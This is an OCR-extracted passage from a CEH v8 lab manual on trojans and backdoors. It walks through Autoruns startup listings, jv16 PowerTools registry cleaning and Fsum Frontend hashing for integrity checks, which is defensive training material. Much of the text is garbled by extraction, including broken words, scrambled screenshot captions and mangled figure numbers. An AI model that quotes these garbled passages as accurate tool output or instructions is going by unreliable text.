Properties for dns.exe: 1572
| ‫ך־‬

Domain Name System (DNS) Server
M
icrosoft Corporation

Version:

G
.02.8400.0000

Path:
C:WindowsSystem32dns.exe
End Process
OK

FIGURE 8 : Killing
.4
Processes
1m

TASK

2

Autoruns

G o to W indow s Server 2012 V irtual M achine.
Double-click Autoruns.exe, w hich is located at D:CEH-ToolsCEHv8
Module 06 Trojans and BackdoorsProcess M onitoring ToolsAutoruns.
It lists all processes. D LLs, and services.




O Autoruns [WIN-2N9STOSGIENAdministrator] ‫ ־‬Sysinternals: www.sysinter.J ~
File

Entry

Options

] Hijacks

User

Help

Image3 |ExecuteBoot3 |CodecsJ

1ft Winsock Providers ]

O Everything

^

Logon

|

Print Monitors |

LSA Providers |

< Explorer | &

Internet Explorer | J

,‫ ►־‬Applnit
$

|

,‫־‬V KnownDLLs

£ ‫ ־‬Network Providers | 9 . Sidebar Gadgets
Scheduled Tasks |

Services |

Drivers

Autorun Entry
Description
Publisher
Image Path
■}jf HKLMSOFTWAREMicrosoftWindow$ NTCurrentVers10nWinl0g0nl'AppS etup
0 g ] UsrLogon cmd
c:windowssystern32usrlo...
HKLMS 0 FTWAR EM icrosoftWindowsCurrentVersionRun
0 [ ij] HotKeysCmds hkcmd Module
Intel Corporation
c: windowssystem32hkc...
0 £ IgfxTray
3
igfxTray Module
Intel Corporation
c:windowssystem32igfxtr. ..
0 fil Persistence
persistence Module
Intel Corporation
c:windowssystem32igfxp...
$ HKLMS 0 FTWAREW0w6432N odeM icrosoftWmdowsCurrentVersionR un
E
Adobe ARM
Adobe Reader and Acrobat... Adobe Systems Incorporated c:program files (x86)Vcomm..
0 0 Adobe Reader Adobe Acrobat SpeedLaun.. Adobe Systems Incorporated c:program files (x86)adob
0
EPS0N_UD_S.. EPSON USB Display VI 40 SEIKO EPSON CORPORA.. c:program files (x86)epso...
r‫־‬a r ‫־‬
.. ■
______ ^
. T ■
_______________ ^
._____________________ ._______ ™ , ****
.

Ci You canview Explorer's
file properties dialog for an
entry's im file by
age
choosing Properties in die
Entry m You can also
enu.
have Autoruns automatically
execute anInternet searchin
your browser by selecting
Search Online in the Entry
m
enu.

Ready

Windows Entries Hidden.

FIGURE 8 :AutorunsMainWindow
.5
& Simply run Autoruns
andit show you die
s
currendyconfigured a to
u start applications in the
locations that m direcdy
ost
execute applications.
Perform anewscan that
reflects changes to options
byrefreshing die display
C Internet Explorer This
Q
entry show Browser Helper
s
Objects (BHO's), Internet
Explorer toolbars and
extensions

1°-

follow ing is the detailed list on the Logon tab.
O Autoruns [WIN-2N9STOSGIENAdministrator] - Sysinternals: www.sysinter...L
I File

Entry

Options

User

Help

d is) ^ 1 X ^
H

Codacs

|

P

Boot Execute

|

^

i f : Winsock Providers

!3 Everything |

^ Explorer

Image Hjacks

Print Monitors

Logon

|

[ j) Applnit

LSA Providers

4$ Internet Explorer

Autorun Entry
Description
0
[ ij]
HotKeysCmds hkcmd Module
0
lafxTrav
igfxTray Module
0
lil
Persistence
persistence Module

£

|

|j») KnownDLLs |

Network Providers |

'1 Scheduled Tasks |

Publisher
Intel Corporation
Intel Corporation
Intel Corporation

^

Wnlogon

Sidebar Gadgets
Services

^

Drivers

Image Path
c:windomsystem32hkc...
c:windowssystem32igfxtr
c:windowssystem32igfxp .

S
0

E3
Adobe ARM
Adobe Reader and Acrobat. . Adobe Systems Incorporated c:program files (x86)comm..
0
Adobe Reader...
Adobe Acrobat SpeedLaun... Adobe Systems Incorporated c:prograrn files (x86)adob..
0
EPS0N_UD_S. EPSON USB Display V I.40 SEIKO EPSON CORPORA... c:program files (x86)epso.
9
googletalk
Google Tak
Google
c:program files (x86)Vgoogl.
0 fH
SurvlavaUpdat JavalTM) Update Scheduler
Sun Microsystems, Inc. c:program files |x86)Vcomm
t S C:ProgramDataVM1c10 softWrKlowsStart MenuVProgramsStartup

0

Ready

Windows Entries Hidden

FIGURE 8 :Autom Logonlist
.9
ns
11. The follow ing are die Explorer list details.

C E H Lab M anual Page 473


|

A

Wriogo


O Autoruns [WIN-2N9STOSGIENAdministrator] ‫ ־‬Sysinternals: www.sysinter...L
File

Entry

| Codecs

Services All Windows
services configured to start
automaticallywhen the
systemboots.

Options

|

3

User

Boot Execute

Winsock Providers |

&

Z ? Everything | ^

Help

| 3

1 Print Monitors
*

Logon[

,j

Explorer

Image H^acks
|

£

|

'■ Applnit
>

LSA Providers |

|

'

KnownDLLs

]

Network Providers |


Scheduled Tasks |

A

W nbgon

Sidebar Gadgets
Services |

Drivers

Autorun Entry
Description
Publisher
Image Path
HKLMS 0 FTWAR EClassesProtocoisF*er
0 ^ te x t/x m l
Microsoft Office XML MIME... Microsoft Corporation
c:programfilescommonfi..
• iff HKLMS oftwareClassesx heC xVContextMenuHandlers
S
0
^
SnagltMainSh... Snagit Shell Extension DLL
TechSmith Corporationc:program files (x86 )techs..
0
fo‫־‬
WinRAR WinRAR shel extension
Alexander Roshal
c:programfileswinrarrare.
HKLM S 0ftwareW0w6432N0deClassesx helE xContextM enuH andlers
S
0
SnagltMainSh. Snagit Shell Extension DLL TechS mith Corporation
c:program files (x86 )techs..
0
*V
WinRAR32
WinRAR shel extension Alexander Roshal
c:programfileswinrarrare.
HKLM S oftwareClassesD »ectoryS heMExSContextM enuH andlers

0

SnagltMainSh

Snagit Shell Extension DLL

TechS mith Corporation

Ready

c:program files (x8S)techs.


FIGURE 8 0 AutoninsExplorer list
.1 :
12. T lie follow ing are die Service s list details.
O Autoruns [WIN-2N9STOSGIENAdministrator] - Sysinternals: www.sysinter...L
File

*J

Entry

&

H

(3 Drivers This displays all
3
kernel-m drivers
ode
registered on tlie system
except those that are
disabled

&

Codecs

Options

User

|

‫־־‬I Boot Execute

fc?; Winsock Providers |
O

Help

B X *

Everything | ^

]

3

& Print Monitors

Logon |

Image hijacks

Explow [ j

|

[^ Applnit

LSA Providers
Internet Explorer

f

|

S cheduled Tasks |

Publisher
Autorun Entry
Description
g HKLMSystemCurrentControlSetServices
0 [ 1 ‫ י‬AdobeFlashPta This service keeps you Ad... Adobe Systems Incorporated
0 [■1 c2wts
Service to convert claims b .. Microsoft Corporation
0 0 EMPJJDSA
EPSON USB Display VI 40 SEIKO EPSON CORPORA..
0 F I M02illaMainten... The Mozia Maintenance S. . Mozilla Foundation
0 F I ose
Savesinstalationfilesused .. Microsoft Corporation
0 F I osoosvc
Office Software Protection... Microsoft Corporation
0 H WSusCertServer This service manages the c... Microsoft Corporation

Ready

KnownDLLs

Network Providers 1

|

^

Wintogon

Sidebar Gadoets
Services

Drivers

Image Path
c: windowssyswow64ma
c:program filesNwindows id..
c:program files (x86 )epso...
c:program files (x86 |m02i ...
c:program files (x86)comm
c:program file$common fi
c:program filesVupdate ser


FIGURE 8 1 Autoruns Serviceslist
.1 :
13. T lie follow ing are die D rivers list details.




File

Entry

3

Options

User

Image H^acks

|ExecuteBoot! 3 |CodecsH

& Print Monroes

ft Winsock Providers [

O Everything
£9 Scheduled
T asks Task
scheduler tasks
configured to start
at boot or logon

|

Help

| $

Logon | . < Explorer | ^

Autorun Entry

[

LSA Providers* |

£‫ ־‬Network Providers |


Description

Scheduled Tasks |

Publisher

,‫ $־‬Applnit

Sidebar Gadgets
Services

Drivers

Image Path

HKLMSystemCurrentControlSetServices
|LSI 3ware SCSI Storpoct Driver}SI

c: windowssystem32drrve.

S ) adp94xx(

Adaptec Windows SAS/SA... Adaptecjnc.

c: windowssystem32drrve.

adpahci ^

Adaptec Windows SATA S t.. Adaptec, Inc.

c: windowssystem32drive.

adpu320 ^

Adaptec StorPort Ultra320... Adaptecjnc.

c: window$system32drrve.

,amdsata 4
‫־‬

AHD 1.2 Device Driver


amdsbs ^

AM D Technology AH Cl Co... AM D Technologies Inc.


amdxata ^

S torage Filter Driver

c: window$system32drive.

^

3ware

Advanced Micro Devices
AdvancedMicroD evices

Adaptec RAID Storpoct Driver PMC-Sierra, Inc.

c: windowsSsystem32drrve.

Adaptec SAS RAID W S0 3 ... PMC-SierraJnc.

arcsas &

c: window$system32drive.

Ready


FIGURE 8 2 AutorunsDriverslist.
.1 :
14. The follow ing is die Know nD LLs list 111 Antonins.
File

Entry

Options

User

Help

d j) & B X *
I?• Winsock Providers |

‫כ‬

Everythin
Ever/hing

Q

Codecs

O

^

^

Logon |
Q

Print Monitors | ^
Explorer ]

Boot Execute

Autorun Entry

|

Description

&

LSA Providers |

Internet Explorer ] J

f"^ Image Hijacks

|

f

Network Providers | 9• Sidebar Gadgets
Scheduled Tasks 1

[j| Applnit

Publisher

Services [

KnownDLLs

j

Drivers
Winlogon

Image Path

ijT HKLM SystemCurrentControlSetControfSession ManagerKnownDII$

0

13

_W0w64

File not found: C:Wndows...

0

1‫ר‬

W ow 64cpu

File

0

11

Wow64win

File not found: C:Wndows. ..

Ready

not found: C:Wndows.


FIGURE 8 3 AutoruasKnownDLL’slist.
.1 :
15. Install and launch jv16 Pow erTools 111 W indow s Server 2012 (host
m achine).
T A S K

4

16. jv l6 Pow er T ool is located at D:CEH-ToolsCEHv8 Module 06 Trojans
and BackdoorsRegistry M onitoring Toolsjv16 Pow er Tools 2012.
Jv1 6 Pow er Tool
17. T o launch jv16 Pow erTools, select die S ta rt menu by hovering die mouse
cursor on die lower-left corner ot die desktop.



|

,‫ ־‬KnownDLLs
V

|

A


u
‫״‬nilb
‫י‬
U
R ta
n

€r
(t n
a

aP
PmT...
k ti

■ W d w S rv r21
3 in o s e e 02
W o tS rv r21 R c teC nx tr C u rn
ird w e e 02 o a a c fa a c t.
fv lu to c p.Eud* 0
ca a r o y
4.

..

.* JL JL .

‫ל‬

1

FIGURE 7 : Windows Server 2 1 Start-Desktop
.1
02
18. C lick jv16 Po w erT oo ls 2012 111 S ta rt m enu apps.
Administrator A

Start

03 Winlogon
Notifications Shows DLLs
that register for Winlogon
notification oflogon events

FIGURE 7 : Windows Server 2 1 Start Menu Apps
.2
02
19. C lick the Clean and fix my com puter icon.

C] Winsock Providers
Shows registeredWinsock
protocols, including
Winsock service providers.
Malware often installs itself
a aWinsock service
s
provider because there are
few tools that canrem
ove
them Autoruns canuninstall
.
them but cannot disable
,
them




P
1

jv l 6 PowerTools 2012
E*e

Language

O

lo o k

K

Help

r

Trad L rnM Don n E ffect - 60 d ays le ft

Live Support:
O nlne

Handbook not
avadaWe

Hom e

Registry Tools

‫ו^ד‬

File Tools

i

System Tools

Fully remove
softw are and
leftovers

Speed up my
computer

Immunize my
computer

Verify my downloads
are safe to a n

Privacy Tools

—

Backups

Control which
programs start
autom abcaly

A cton H sto ry

LUJ

Settings

Trial Reminder

■

92<*>

Registry Health

9SV0
PC Health
j v l 6 PowerTools (2 .1 .0 .1 1 7 3 ) runnng on D atacenter Edition (x6 4) with 7 .9 GB o f RAM
[ 1 0 : 2 9 : 4 5 ‫ ־‬T ip ]: Your system has now been analyzed. The health score o f your computer ts 95 out o f 100 and the
health score o f y o ir W ndow s r e g s try 6 9 2 o u t o f 100. I f you scored under 100 you can improve! the ratings by
usrtg the O ean and F a M y Computer tool.

FIGURE 8 0 jvl6Hom p g .
.2 :
e ae
20. The Clean and fix my com puter dialog box appears. C lick the Settin g s tab
and then click die S ta rt button.
jv l 6 Pow erTools 2012 [W8-X&4] - Clean and fix m y co m p uter

□ gs
S ttin
e

A d nl
d itio a
s fe
a ty

#

A d nl
d itio a
ot n
pio s

*

L i 10

S a h Ig oewr s
e rc
n r od
wr s
od

Settings
Emphasize safety over both scan speed and the number o f found errors.

A
Emphasize the number o f found errors and speed over safety and accuracy.

Selected setting:

H


Normal system scan policy: all Windows-related data is skipped for additional
safety. Only old temp files are listed.

Cancel


(3 LSA Providers Shows
S
registers Local Security
Authority (LSA)
authentication, notification
and securityp
ackages


FIGURE 8 1 jvl6 Cleanan fixm com uterd g e
.2 :
d
y p
ialo u .
21. It w ill analyze your system for tiles; this w ill take a few minutes.
1 jv16 PowerTools 2012 [W8-x64] - Clean and fix my com puter! ‫־‬
-1
File

Select

Tools

I ‫ם‬P x

Help

[
‫יג‬

Analyzing your computer. This can
take a few minutes. Please wait...

Abort

‫ ט‬Printer Monitor
Drivers Displays DLLs that
load into the print spooling
service. Malware hasused
this support to autostart
itself

FIGURE 8 2 jvl6 Cleanan fixm com uterA
.2 :
d
y p
nalyzing.
22. Com puter items w ill be listed after die complete analysis.
iv16 PowerTools 2012 rW8-x641 - Clean and fix mv comDuter! ‫־‬

L J You can save die results
of a scanwith File->Save
and load a saved scanwidi
File->Load. These
com ands work with native
m
Autoruns file form but
ats,
you canuse File->Export to
save a text-onlyversion of
the scanresults. You can
also autom the generation
ate
of native Autoruns export
files with com andline
m
options

File

Select

Tools

! ‫ ם‬r

x

Help

Item
Severity
Description
Tags
Item

/

Seventy

Descrpbon

Tags

........................

!3 Registry Errors

7

!‫־‬I ^

7

Invalid file or directory reference

I ] c ) Registry junk
‫ח‬
|~1
‫ח‬
^

266

♦ Obsolete software entry
J

4

Useless empty key

146

♦ Useless file extension
J

116

+ Start menu and desktop items
J

I

23

-

II

Delete

dose

Selected: 0, highlighted: 0, total: 296

FIGURE 8 4 jvl6 Cleanan fixm com uterItem d ils.
.2 :
d
y p
s eta
23. Selected item details are as follows.

L J Sidebar Displays
Windows sidebar g g
ad ets




jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer
File

Select

Tools

Help

Item
Seventy

Description
Tags
Item

/

Descryton

Seventy

Tags
A
7

13 Registry Errors
13 ‫ח‬

Invalid tile

01 directory

‫ כ‬HKCRUnstall

reference

:3 %

1HKCRUnstal

=

Fie or directory 'C:

^ HKLMsoftw<

13%

Ne or directory X :
FJe or directory X :

_ ] HKLMsottw;^B
□ HKLMSOFT/

13%

□ HKLMSOFTl

H Com
pare the current
Autoruns displaywith
previous results that you've
saved. Select File |Compare
and browse to the saved file.
Autoruns will displayin
green any new item which
s,
correspond to entries that
are not present in the saved
file. Note that it does not
showdeleted item
s

7

FJe or directory X :

13%

_ | HKLMS0ttwi

File or directory X :
Fie or directory X :
File or directory X :
266

□ 13 Registry junk


FIGURE 8 3 jvl6 Cleana dfixm com
.2 :
n
y pute! Item
s.
24. The R egistry junk section provides details for selected items.
1‫ י‬jv16 PowerTools 2012 [W8‫־‬x64]~ Clean and fix my computer! ‫־‬
File

[‫־‬J If you are running
‫־‬
Autoruns without
administrative privileges on
Windows Vista and attem
pt
to change die state of a
global entry, you'll be denied
access. Autoruns will display
adialogwith abutton that
enables you to re-launch
Autoruns with

V

Select

Tools

‫ם‬

*

Help

Item
Severity
Description
Tags
Item

_] 3

/

Severity

Description

Tags

Registry junk

3 ‫ח‬

266

Obsolete software entry

4

□ HKCUVSoftw

30%

Obsolete software e

□ HKCU^oftw

30%

Obsolete software {

□ HKUSS-1-S-

30%

Obsolete software ‫ז‬

□ HKUSV1-5-

30%

Obsolete software e

□ (3 Oseless empty key

146

□ HKCRVaaot |

10%

Useless empty key

□ HKCRVaaot

20%

Useless empty key

□ HKCRVacrot

20%

Useless empty key

‫ ח‬MKCRV.aaot

20%

Useless emotv kev

‫✓י‬


FIGURE 8 5 jvl6 Cleanan fixm com uterItemregistryju k
.2 :
d
y p
n.
25. Select all check boxes 111 die item list and click D elete. A dialog box appears.
C lick Yes.

—
L&S fcslilfifl Page 4 9
7
Empty Locations selection
in die Options m is
enu
checked Autoruns doesn't
showlocations with no
entries



jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer[

F S le t T o H lp
ile e c o ls e
Item
Seventy
Description
Tags
Item

Seventy

0J

Descnptran

Tags

jv16 PowerTools 2012

You are about to delete a lot of erroneous registry data. Using the Fix
option is always the better option. Are you sure you know what you are
doing and want to proceed?

0

*I

O

S la il menu and desktop items

23/23

Selectedj29^highlightedfttotah296

FIGURE 8 6 jvl6 C a dfixm com
.2 :
lean n
y pute!Itemcheckb x
o.
26. G o to the Home tab, and click die Control w hich program s start
au to m atically icon.



UJ The Verify Signatures
option appears in the
Options m on system
enu
s
that support im signing
age
verification andcan result in
Autoruns querying
certificate revocation list
(CRL) web sites to
determ if im
ine
age
signatures are valid


FIGURE 8 8 jvl6 Controlwhichp ramstart au m
.2 :
rog
to atically.
27. Check programs in Startup m anager, and then you can select die
appropriate action.

T Z S

jv16 PowerTools 2012 [W8-x64] - Startup Manager
File

Cl The Hide Microsoft
Entries selection om
its
im
ages that have been
signed byMicrosoft if
Verify Signatures is
selected and om im
its ages
that have Microsoft in their
resource's com
panynam
e
field if Verify Signatures is
not selected

Select

Tools

Help

Enabled
System entry No
Program
)usched.exe
C: program Files (x86)VCommon 1
Filename
Command Ine 'C:program FJes (x86)Common
FTVV<
Loaded from rt<EY_LOCAL,MACHINE SO
JavaCTM) Update SchecUer

Descrption
Tags
Enabled

/

‫־‬

Process running Yes
PID
Threads

4280
4

Base priority
Normal
Memory usage 9.12 MB
Page file usage 2.23 MB
File size

246.92 KB

Descrption

Program

Tags
10 —

|l 1Found software
C:program Files

□ Yes

googletalk.exe

Google Talk

□ Yes

EMP_UO.exe

EPSON USB Dispk C:Program Files

□ Yes

Reader_sl.exe

Adobe Acrobat S| C:program Files

S

)usched.exe

I
‫מ׳‬
i

■ Yes

C: program Files

□ Yes

AdobeARM.exe Adobe Reader ar1C:program Files

□ Yes

1
gfxtray.exe

igfxTray Module C:Windowsteyst

□ Yes

hkcmd.exe

hkcmd Module

□ Yes

1
gfxpers.exe

=

persistence Modi‫״‬C:Windowsfeyst

C:Windows^yst

FIGURE 8 9 jvl6 StartupM
.2 :
anagerD
ialogue.
28. C lick die R eg istry Tools menu to view registry icons.

f!
File

B3 Use the Hide Microsoft
Entries or Hide Windows
Entries in the Options
m to help youidentify
enu
software that's been ad ed
d
to a systemsince installation.
Autoruns prefixes the nam
e
of anim s publisher with
age'
"(Not verified)" if it cannot
verify adigital signature for
the file dial's trusted by the
system

jv1 Po erT o 2 1
6 w o ls 0 2
Language

Tools

Help

IMACECRAFT
>SOFTWARE

Trial Urn ta bon n

Effect -

60 days left

Live Support:
Online

L
Handbook not
avaiaW e

$

m

49

R eg s try
Manager

R e g istry Tools

Registry
F ^ der

Registry Find
& Replace

m

R eg etry
Compactor

Registry
Information

Registry
Monitor

Registry
Cleaner

System Tools

^

Privacy Tools

Backups

A cto n H sto ry

IU I

Settings

10
0%

Trial Reminder

Registry Health
You a re using the free trial version o f j v l 6 PowerTools. Pick h ere to buy the
real version'

FIGURE 8 0 jvl6 Registryto ls.
.3 :
o
29. C lick F ile Tools to view hie icons.




E 1The Hide Windows
E
Entries om im
its ages signed
byWindows if Verify
Signatures is selected. If
Verify Signatures is not
selected, Hide Windows
Entries om im
its ages that
have Microsoft in their
resource's com
panynam
e
field and the im resides
age
beneaththe %SvstemRoot%
directory

FIGURE 8 1 jvl6 File too
.3 :
ls.
30. C lick System Tools ro view system icons.
jv1 Po erT o 2 1
6 w o ls 0 2
Fite

Language

Io o ls

I MACECRAFT
' SOFTWARE

x

Help

Trial Limtabon in E ffect - 60 d ays left

Live Support:
Online

L
Handbook not
avaiaW e

Home

Registry Tools

U
Softw are
Unrts ta le r

!Im■!

^

Q j

EH
Startup
Manager

Service
Manager

S tart M enu
Tool

Automation
Tool

System
Optimizer

S y s te m Tools

Privacy Tools

Backups

Action History

IQ I

Settings

10
0%

Trial Reminder

Registry Health

& Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
§a<&d9fl»‫־‬
Page 4 2
8

You a re using th e free trial version o f j v l 6 PowerTools. Clioreal version!

to b u y the

FIGURE 8 2 jv!6 Systemto ls.
.3 :
o



31. C lick Priva cy tools to view privacy icon.
I E*e

!,*"Quage

1001*

Help

1
MACECRAFT

Trial Lm tabon in Effect - 60 days left

' SO FTW ARE

A

L
Handbook not
avarfable

Live Support:
Online

Registry Too*s
history
Oeaner

1^ ‫ך‬

F ie Tools

B

Disk Wiper

System Tools

Backups

Actjon H story

| L lj

Settings

3

Trial Reminder
You are usng the free trial version o f jv 16 PowerTools. C k k here to buy the
real version ‫י‬

FIGURE 8 3 jvl6 Privacytoo
.3 :
ls.
32. C lick Backups in die menu to display die Backup Tool dialog box.
T^TeT x T


£Q You can
com pare the
current Autoruns
display w ith
previous results
th at you've saved.
S e le ct
File|Com pare and
brow se to the
saved file .
Autoruns w ill
display in green
any new item s,
w hich correspond
to en tries th at are
not present in the
saved file . Note
th at it does not
show deleted
item s

File

Language

O
£He

loots

Help

MACECRAFT

Trial Umitabon in E ffect - 60 days le ft

SO FTW ARE

Live Support:

jv16 PowerTools 2012 [W8‫־‬x64] ‫ ־‬Backup Tool
Select

Registry
Backups
Descnptjon

look

I~ I

L
Handbook not

x

1

Help

Fie Backups

Type

Other
Backups
Size

ID

C reated

Q 13 File Backups
□

Clean and D ata removed 3 4 .6 KB

00062D

2 1 .0 9 .2 0 1 2 ,

R S je te ^ u h h d ^ ta
e e c d ^ g liq te ^ o M
■

FIGURE 8 4 jvl6 Backuptook
.3 :




33. G o to W indow s Server 2 0 12 Virtual M achine.

= TASK

5

Fsum FrontEnd

34. Double-click Fsum FrontEnd.exe, the executable tile located at D:CEHToolsCEHv8 Module 06 Trojans and BackdoorsFiles and Folder
In tegrity CheckerFsum Frontend.
35. The Fsum Frontend main w indow is shown 111 the follow ing screenshot

iz r^ * ‫׳‬

Fsum Frontend vl .5.5.1

ESS

B - Q Fsum Frontend
Tools □ ₪
B - Q Calculate hashe

n Methods (96)
‫ ח‬ap hash

C bdkr

n crc16_ccitt

H I crc16_ibm

□ <rc16_125

□ crcl6_zmodem □ crcM

□ crcJZ

I crc32_br1p2
Z

d crc32jamcrc

1 i crc.54

( j djb hash

d dhoZ35

(7e o ky
d nc

5E=: :

‫ ח‬adlcrS

Q adlcr15

‫ ח‬ct£um_mp€c2

Q crc8

Verify checksur 3&■■:

□ crcl6_xr‫־>־‬dem
i

Tod 23 - :

■ ■

*Generate chec
Options 0 5 !
‫•״״‬
About

c1c32_mpcg2

n dF32

Q adler32
f ‫־‬l crc16

O crc64_ecma

(_) flctchcr8

Q fletchcrl 6

Q . fletcher32

Cv -2
f O2
n

L

f

n

1

/ ‫י‬

Compare

Hth
a:
lS a .U a

Encoding:

Bate 16 (hexadecimal)

C?Log

2 ‫,״‬

Web sits htipi.'/fsumfesourcefoi

& CEH-Tools are
also located
mapped N etw ork
D rive (Z :) of V irtual
M achines

FIGURE 8 5 FsumFrontEndm w
.3 :
ain indow
.
36. Select the type ot hash that you want; let’s say md5. Check die md5 check
box.
Fsum Frontend v1.5.5.1
_ Fsum Frontend

.t
. ___...x

.........

(_J haval224 (3)

u b*val224 (4)

u haval224 (5)

Lhoval256(3)

Tort

■ □
j

□ /wch

Q jihJKh

□ wnti?

C l «nd4

1 0 Verify checksur
Generate chace

Dpjwr32

Tool*

I HI‫ ־‬Clclaehih
- aut a t
&>*
■

!

; 8 8 Options

™ v ! . . J.;

hava 1256(4)

l_h»vjl256(5)

(✓ m d *.|

n rip«mdl28

T 1rlpemdlftO

□ ripemd250

C ripemd320

C ‫ מ‬hash

0 sdbm

f l shaO

D >h«1

□ »ha2 (224)

C sha2 (256)

C 3h«2 (384)

1 1*1 2 (5 1 2 )

n si:c64

f 1sncfru2128(41

T 1snefm’ 128 (81 r

snefru2 256 W

r

=

snefru22S6f8>

v

4‫ |־--י‬About
Mash:
F ie
^

m
Co

^

0

a |

U kQ

Encoding: | Base 16 (hexadecimal) v

□ hw ac

[<
C

Wb tt h :.'/ u>« j‫<׳‬r r n ! I
e o ttp fs r »to «o3* e



‫46-0״‬


FIGURE 8 6 FsumFrontEndcheckingm 5
.3 :
d.
37. Select a tile by clicking die F ile browse bottom from die desktop. That is
Test.txt.
Fsum Frontcnd v1.5.5.1
FsumFrontend
Q Tools

□ Methods (1 /9 6 )

0 -L 2 Co It j ate t«1Ik

Q H ave Autoruns
au to m atically
execute an
Internet search in
your brow ser by
selectin g Search
O nline in the Entry
menu

I- 5 ne
c

□ havaL24 (J)

□ hava!224 (4)

□ haval224 (S)

C haval256(3)

|

□ /hash

□ jshash

□ md?

G md4

B md5

O pM wr?

□ pj"32

:

hava!2S6 (4)

Q ] hav3 2S0 (5)

G ripemdl&O

E" 1ipcmd256

E" ripcmd320

I I1
sha>1
>

(~1 shaO

Q shal

□ sha2 (224)

Q sha2 (256)

□ sha2(3&4)

n « k a 2 CS12I

Generare chec*

□ ripcmdl28

risd m
b

:•■S3 Verify chccksur
gH Optiors

in tl7e6d

IH snefru2 128(4)

I I snefru2 128 (8)

I

snefru2 256 14) I

snefru2 256II

■ ?| About
:
J
Hash:
F ie

|
Encoding: |Base 16 [hexadecimal) v j O HMAC

=3 B ,

Website httpi.'/fiumfesourcerorge-ne:

FIGURE 8 7 FsumFrontEnd file b w
.3 :
ro se.
& Autoruns
displays the text
"(N o t verified )"
next to the
com pany nam e of
an im age that
eith er does not
have a signature
or has a signature
th at is not signed
by a ce rtifica te
root authority on
the lis t of root
authorities trusted
by the system

B--EZ Fsum Ficntcnd
a - S Tools
: b -ZH Calculate hashes

□M ethods :96)
0 adler?

;-•G3 Fie
:-2 3 Tec
jQ Verify checfcsi »(
___o. Generate chec

(~ladlerl6

□ *r 2
»e3

n ap hash

|‫ |־־‬bdkr

D (b u 1r.m p cg 2

[H «c8

□ crt16

□ ac16_ccitt

‫ ח‬crc16Jbm

□ ac15_x25

0© '•

: ‫נ‬
1

0»genire ’
■

Nev» folder

Desktop

J| Do*nlc«d«

Ltoaries
3 Documents

A-

Computer
Sycrem Folder

SK

Recent pieces

Network
System Folder

J 1 Mudr
Pictures
8

fe

Videos

flP Computer
Local Disk (C:)

<r

Google Chiomc
Shortcut
Z31 KB
Test
Text Document

1 a Local Disk D)
—
a

M071lla Firefox
Shortcut
1.06 KB

0 ye
bt s

Local Disk [&)
‫! ־‬le nan‫־‬e: Test

|a !I Files r . ‫־‬T

3

Website. http:Vfsumfc.50u‫׳‬ccfcrgc.‫*׳‬ct

FIGURE 8 8 FsumFrontEnd fileo e .
.3 :
pn
38. C lick Add Folder to select a folder to be added to die hash, for example,
D:CEH-Tools




Fsum fro n te n d v1 .5.5.1
B 1 3 -‫ ׳‬Fsum Frontend
|i) □ Tools
i

1 1■
- I

— I ‫ם‬

x

‫ ח‬M e th o d s (!/95:

Cdk.jldte '1a il*
( J h«val224 (J)
‫׳ “ ־‬
J
!•••^3 Tort

K Verify checksur
! |k G*n«r*!« <h«ci:
]••■88 Options
About

[ J h«val224 (4)

j j haval224 (5)

H jh*«h

Q J hiKh
‫ז‬

CD >nd^

npjv»32

n rip e m d l28

U haval256 (3)

L havat25&(4)

C h«val25$(5)

[Z rnri4

rlpemdloO

E ‫^*ייי‬

d panama

P ripemd256

□ ripemd320

C ish a sh

C sh a 2(2S 6)

□ »dbm

□»h aO

□> h d 1

□ »ha2 (224)

1 ska2 (512)

n»i2«64

1 1*ncfru2123 Ml

I

snefm2 128 f81 V snefru2 256 M

( I 384) 2««‫)נ‬
T snef1 2 254 f8>
u

v

Cow pare
Hash:
F ie

l)ACEH-T0clsCEHv3 Module 06 Trojans and BackdoorsNFiles and Folder Integrity ChedtciVsumfrontend1.5‫. _ |־‬

^ |_ 0 1

Autoiuns prefixes the
nam of anim s
e
age'
publisher with "(Not
verified)" if it cannot verify a
digital signature for die file
that's trusted by the system
G fl

Encoding: |Basc 16 (hcxadcdmal) v | [ J HMAC

File

<
1t e L o J V

=

W tbflte http:,'/fscmfecoj'c«ror9* m : 1

FIGURE 8 9 FsumFrontEndAdd Folder.
.3 :
Fsum Frontend v1.5.5.1
Fsum ficntend
H-b2 Tools
I B -t3 Cakuiatehashes

j I id«t

jI‫׳‬

d i Ta
e

ft] Verify checksumhies :
6ene £ -‫ ־‬checksumfi
•
ate
Options 05 ••:

| Methods <1/96!

|gj!h
h3

L 9- ‫ר‬
^‫נ‬
‫^ז׳‬

LI 9
*‫ז*י‬

_JhMl160(3)

C_Kbv9II60(J}

□ havall60(5)

□ hav?C24(4)

Q

Qmd2
□ rip«fnd25€

□ hwal256 G)
5jmd5

Q e dZ
iip m S Q

(5)

Cm
u

Hs
«*
F DC4T0 C
ile t B-0IAE

□rhs
sah

LlhailfiO
□ hava!192(3)

U havelVA (3)
□ h«v«l192 (A)

_|
2
| Koval1 8 (4)
□ havall92[5)

a85( ) jhs
Daa 5(4 □hvl265 Q ah
hvl26 )
□ panama
□p 3
jw
2
□ ripemd128
[I!sdbm
□sa
hO
[ ldaal

Browse For Folder

‫־‬H

I_h«v«n2ac5)
Ch«r11224{3J
Cjsh*5h
C ripemd160
Cshi2 224)

CekAu fotn-. . . '‫ז‬ed eG
hcef m n d1 5 amj
s r e 51 •

► “•“*
- ‫י״‬
i ‫י‬

t A A m is to
• d in tra r
Compute‫־׳‬

A

t fa Local D (C
isk O
«l D < )
isk D

iL

£3 A "Hide Signed
Microsoft Entries" option
helps you to zoomin on
third-partyauto-starting
im
ages that have been add
ed
to your system

I

| CW«I 1

iL ._______ ——

FIGURE 8 0 FsumFrontEndAddingFolder.
.4 :
39. Respective tiles o f die selected folder w ill be listed 111 a list box.




II

_
2

Fsum Frontend v l.5.5.1

1

14■ Ftum fk >« d
tn
a U Tooii
: m t J CakulatehaihM
i
:
I«Bl
(9J V» f, checksum1 c.
4
:
an< th«cbum(4
rat«
cJJ Options
About

61

‫! -ז‬u H

|

□M
aihodb< /9 (
1 6
□ haval*6 01
0
□ K v»LL4(4)
a
f~
~l
Qr^amd?*
141ft?(250

t&
m
?

( > vaM 0 )
w 6 (4
r Saval2i4|S)
( k M
m
Lnpemdira
1 O 2(1«4>
m

Hath:
File

[ |haval160(3)
‫|־־‬haval2S60)
v|«1d5
Qnh»«h
l«ha?(512)

t ►W192 (J)
□hw«l2*(4)
paiiama
[julbm
